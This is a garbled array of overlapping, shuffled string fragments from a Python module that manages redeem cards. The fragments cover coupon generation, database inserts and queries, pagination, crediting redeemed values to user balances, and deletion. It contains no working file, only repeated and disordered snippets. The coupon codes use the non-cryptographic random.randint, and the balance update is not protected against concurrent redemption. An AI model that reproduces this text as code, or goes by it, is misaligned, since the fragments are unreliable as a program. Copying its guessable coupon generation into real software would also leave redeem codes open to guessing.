\"\"\"SELECT count(redeem_code) 
as", "= %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao", "set contains all upper case letters and 0 to 9 char_set = list(string.ascii_uppercase)", "# Query database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\"", "in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code of length 16", "Commit every 10 writes if (i + 1) % 10 == 0: dao.commit()", "str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination", "cursor = dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as len FROM", "Query database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length =", "= DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value", "limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise", "= 0): # Clean the input data limit = str(limit).strip() offset = str(offset).strip()", "= str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if", "str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise", "0: sql += ' LIMIT ' + limit + ' OFFSET ' +", "cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES", "return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch = 1):", "cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the input data user_id =", "type.') # Establish db connection dao = DAO() cursor = dao.cursor() sql =", "is None: raise ValidationError('Invalid redeen code.') # Find user user = find_user(method =", "redeem(user_id, redeem_code): # Clean the input data user_id = 
str(user_id).strip() redeem_code = str(redeem_code).strip()", "dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip() # Establish", "dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance =", "= \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\"", "# Clean the input data value = str(value).strip() batch = str(batch).strip() # Check", "None: raise ValidationError('user not found.') # Establish db connection dao = DAO() cursor", "str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish", "char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): # Generate", "OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code):", "( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)):", "delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip() # Establish db connection", "dao = DAO() cursor = dao.cursor() # Check if the redeem card exists", "'value': value}) # Commit every 10 writes if (i + 1) % 10", "find_user(method = 'id', param = user_id) if user is None: raise ValidationError('user not", "# Check if the redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The", "the input valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.')", "# Clean the input data limit = str(limit).strip() offset = str(offset).strip() if not", "= str(value).strip() batch = str(batch).strip() # Check is the input valid if not", "ValidationError('user not found.') # Establish db connection dao = DAO() cursor = dao.cursor()", "%(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # 
Establish db connection dao =", "n in range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean the input", "( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value})", "= 0, offset = 0): # Clean the input data limit = str(limit).strip()", "0, offset = 0): # Clean the input data limit = str(limit).strip() offset", "The char set contains all upper case letters and 0 to 9 char_set", "def find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip() # Establish db", "# Query database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length", "valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish", "code.') # Find user user = find_user(method = 'id', param = user_id) if", "balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql,", "def count_records_length(): # Establish db connection dao = DAO() cursor = dao.cursor() #", "* FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0: sql", "ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0: sql += ' LIMIT", "%(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit", "Check if the redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem", "ValidationError('IInvalid pagination parameters.') # Establish db connection dao = DAO() cursor = dao.cursor()", "ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code", "# Establish db connection dao = DAO() cursor = dao.cursor() # Query database", "offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.')", "dao = DAO() cursor = 
dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code)", "range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code of length 16 return", "cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data param =", "ASC\"\"\" if not int(limit) == 0: sql += ' LIMIT ' + limit", "is_money from models.shared import find_user import string from random import randint # Prepare", "cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit = 0, offset", "not int(limit) == 0: sql += ' LIMIT ' + limit + '", "def generate_random_coupon_code(): # Generate a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)])", "1): # Clean the input data value = str(value).strip() batch = str(batch).strip() #", "needs # The char set contains all upper case letters and 0 to", "code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def", "user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card", "' + limit + ' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall()", "Clean the input data value = str(value).strip() batch = str(batch).strip() # Check is", "connection dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance", "the input data redeem_code = str(redeem_code).strip() # Establish db connection dao = DAO()", "+= ' LIMIT ' + limit + ' OFFSET ' + offset cursor.execute(sql)", "Query database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql,", "0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def", "does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql,", "string from random import randint # Prepare the char set 
for the coupon", "dao.cursor() # Check if the redeem card exists if find_redeem_card(redeem_code) is None: raise", "sql += ' LIMIT ' + limit + ' OFFSET ' + offset", "0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip()", "= find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.') # Find user", "every 10 writes if (i + 1) % 10 == 0: dao.commit() dao.commit()", "range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean the input data value", "None: raise ValidationError('Invalid redeen code.') # Find user user = find_user(method = 'id',", "get_redeem_cards(limit = 0, offset = 0): # Clean the input data limit =", "= DAO() cursor = dao.cursor() # Check if the redeem card exists if", "Clean the input data limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal()", "Find user user = find_user(method = 'id', param = user_id) if user is", "+ ' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return result def", "redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection", "\"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code):", "= 'id', param = user_id) if user is None: raise ValidationError('user not found.')", "import ValidationError from utils.validation import is_money from models.shared import find_user import string from", "batch = str(batch).strip() # Check is the input valid if not is_money(value) or", "cursor = dao.cursor() # Check if the redeem card exists if find_redeem_card(redeem_code) is", "not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection", "add_redeem_cards(value, batch = 1): # Clean the input data value = 
str(value).strip() batch", "str(value).strip() batch = str(batch).strip() # Check is the input valid if not is_money(value)", "raise ValidationError('user not found.') # Establish db connection dao = DAO() cursor =", "WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db", "def delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip() # Establish db", "is None: raise ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE FROM", "card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not exists.')", "find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip() # Establish db connection", "not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection", "redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code", "[char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code", "Modify the char set according to your needs # The char set contains", "= str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor() #", "is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection dao", "from models.shared import find_user import string from random import randint # Prepare the", "dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code =", "cursor = dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card ORDER", "dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql)", "+ redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE", 
"redeem_code ASC\"\"\" if not int(limit) == 0: sql += ' LIMIT ' +", "= str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') #", "# The char set contains all upper case letters and 0 to 9", "sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance", "redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input", "database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code':", "if not int(limit) == 0: sql += ' LIMIT ' + limit +", "16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch =", "sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit)", "for n in range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean the", "in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if", "for the coupon code # Modify the char set according to your needs", "if the redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card", "DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card", "param = user_id) if user is None: raise ValidationError('user not found.') # Establish", "WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the", "input data limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not", "# Commit every 10 writes if (i + 1) % 10 == 0:", "from utils.exception import ValidationError from utils.validation import is_money from models.shared import find_user import", "dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( 
redeem_code,", "data redeem_code = str(redeem_code).strip() # Establish db connection dao = DAO() cursor =", "redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish", "sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code})", "= %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance':", "= dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id =", "the input data param = str(redeem_code).strip() # Establish db connection dao = DAO()", "BY redeem_code ASC\"\"\" if not int(limit) == 0: sql += ' LIMIT '", "connection dao = DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT", "# Prepare the char set for the coupon code # Modify the char", "count_records_length(): # Establish db connection dao = DAO() cursor = dao.cursor() # Query", "# Establish db connection dao = DAO() cursor = dao.cursor() # Check if", "(i + 1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean", "param = str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor()", "to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code():", "pagination parameters.') # Establish db connection dao = DAO() cursor = dao.cursor() #", "= str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid", "data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card =", "utils.validation import is_money from models.shared import find_user import string from random import randint", "user = find_user(method = 'id', param = user_id) if user is None: raise", "input data param = str(redeem_code).strip() # 
Establish db connection dao = DAO() cursor", "= \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result", "= %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql", "= cursor.fetchone() return result def get_redeem_cards(limit = 0, offset = 0): # Clean", "* FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone()", "Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen", "exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code})", "redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result", "connection dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card (", "WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id':", "str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor() # Check", ") VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(),", ")\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every", "utils.exception import ValidationError from utils.validation import is_money from models.shared import find_user import string", "char set according to your needs # The char set contains all upper", "redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql,", "in range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean the input data", 
"\"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0:", "redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.')", "models.shared import find_user import string from random import randint # Prepare the char", "= str(batch).strip() # Check is the input valid if not is_money(value) or not", "not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code':", "limit + ' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return result", "card does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\"", "the input data value = str(value).strip() batch = str(batch).strip() # Check is the", "data value = str(value).strip() batch = str(batch).strip() # Check is the input valid", "= \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) ==", "user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id})", "{'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip()", "= dao.cursor() # Check if the redeem card exists if find_redeem_card(redeem_code) is None:", "len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean", "' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id,", "'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code':", "db connection dao = DAO() cursor = dao.cursor() # Check if the redeem", "range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if (i", "of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in 
range(0, 16)]) def add_redeem_cards(value,", "user is None: raise ValidationError('user not found.') # Establish db connection dao =", "# Check is the input valid if not is_money(value) or not batch.isdecimal(): raise", "Establish db connection dao = DAO() cursor = dao.cursor() # Query database sql", "find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.') # Find user user", "= DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT * FROM", "Generate a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in", "# Clean the input data redeem_code = str(redeem_code).strip() # Establish db connection dao", "result = cursor.fetchone() return result def get_redeem_cards(limit = 0, offset = 0): #", "DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value )", "= 1): # Clean the input data value = str(value).strip() batch = str(batch).strip()", "data param = str(redeem_code).strip() # Establish db connection dao = DAO() cursor =", "10 writes if (i + 1) % 10 == 0: dao.commit() dao.commit() def", "DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE", "dao.commit() def find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip() # Establish", "%(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) #", "generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if (i + 1) %", "offset = 0): # Clean the input data limit = str(limit).strip() offset =", "ValidationError('Invalid redeen code.') # Find user user = find_user(method = 'id', param =", "= dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES (", "user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] +", "import string from random import randint # Prepare the char set for 
the", "SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value']", "= dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card ORDER BY", "redeem card does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code =", "Clean the input data redeem_code = str(redeem_code).strip() # Establish db connection dao =", "# Establish db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT", "find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE", "%(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data param", "raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao = DAO() cursor =", "user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code)", "%(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance,", "the char set according to your needs # The char set contains all", "data limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal():", "card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.') #", "str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor() # Query", "' + offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code): #", "find_user import string from random import randint # Prepare the char set for", "sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit()", "# Find user user = find_user(method = 'id', param = user_id) if user", "set for the coupon code # Modify the char 
set according to your", "contains all upper case letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n)", "user user = find_user(method = 'id', param = user_id) if user is None:", "and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)]", "VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value':", "cursor = dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card WHERE", "db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card", "DAO() cursor = dao.cursor() # Check if the redeem card exists if find_redeem_card(redeem_code)", "new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE", "cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code =", "{'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit = 0, offset =", "# Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid", "input type.') # Establish db connection dao = DAO() cursor = dao.cursor() sql", "database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length = cursor.fetchone()['len']", "connection dao = DAO() cursor = dao.cursor() # Check if the redeem card", "FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): #", "n in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code of length", "redeem_code = str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor()", "\"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) 
result =", "%(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql =", "dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\"", "dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s,", "redeem_card is None: raise ValidationError('Invalid redeen code.') # Find user user = find_user(method", "raise ValidationError('Invalid input type.') # Establish db connection dao = DAO() cursor =", "Establish db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO", "ValidationError('Invalid input type.') # Establish db connection dao = DAO() cursor = dao.cursor()", "dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip() #", "new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql,", "result def redeem(user_id, redeem_code): # Clean the input data user_id = str(user_id).strip() redeem_code", "coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)])", "if user is None: raise ValidationError('user not found.') # Establish db connection dao", "batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection dao = DAO() cursor", "writes if (i + 1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code):", "db connection dao = DAO() cursor = dao.cursor() # Query database sql =", "set according to your needs # The char set contains all upper case", "random import randint # Prepare the char set for the coupon code #", "''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch = 1): #", "redeen code.') # Find user user = find_user(method = 'id', param = user_id)", "10)] def generate_random_coupon_code(): # 
Generate a coupon code of length 16 return ''.join([str(char_set[randint(0,", "redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip() #", "Check is the input valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid", "Establish db connection dao = DAO() cursor = dao.cursor() # Check if the", "+ limit + ' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return", "offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao = DAO() cursor", "= DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s", "input data value = str(value).strip() batch = str(batch).strip() # Check is the input", "dao.commit() def count_records_length(): # Establish db connection dao = DAO() cursor = dao.cursor()", "redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in", "code # Modify the char set according to your needs # The char", "list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon", "str(batch).strip() # Check is the input valid if not is_money(value) or not batch.isdecimal():", "== 0: sql += ' LIMIT ' + limit + ' OFFSET '", "offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the", "import is_money from models.shared import find_user import string from random import randint #", "not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection dao = DAO()", "return result def get_redeem_cards(limit = 0, offset = 0): # Clean the input", "%(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit = 0,", "user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': 
redeem_code})", "def add_redeem_cards(value, batch = 1): # Clean the input data value = str(value).strip()", "DAO from utils.exception import ValidationError from utils.validation import is_money from models.shared import find_user", "= \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length = cursor.fetchone()['len'] return length", "= str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None:", "upper case letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n", "None: raise ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE FROM redeem_card", "redeem_code): # Clean the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() #", "ValidationError from utils.validation import is_money from models.shared import find_user import string from random", "i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes", "if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not exists.') sql =", "limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao", "9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): #", "Query database sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if", "user_id) if user is None: raise ValidationError('user not found.') # Establish db connection", "value = str(value).strip() batch = str(batch).strip() # Check is the input valid if", "cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the input", "from random import randint # Prepare the char set for the coupon code", "# Modify the char set according to your needs # The char set", "db connection dao = DAO() cursor = dao.cursor() 
sql = \"\"\"UPDATE user SET", "not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao = DAO()", "cursor.fetchone() return result def get_redeem_cards(limit = 0, offset = 0): # Clean the", "raise ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE", "a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0,", "{'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\"", "# Generate a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n", "dao = DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT *", "letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0,", "import DAO from utils.exception import ValidationError from utils.validation import is_money from models.shared import", "= dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code", "return result def redeem(user_id, redeem_code): # Clean the input data user_id = str(user_id).strip()", "cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id", "\"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length():", "according to your needs # The char set contains all upper case letters", "dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code", "= cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the input data user_id", "\"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for" ]
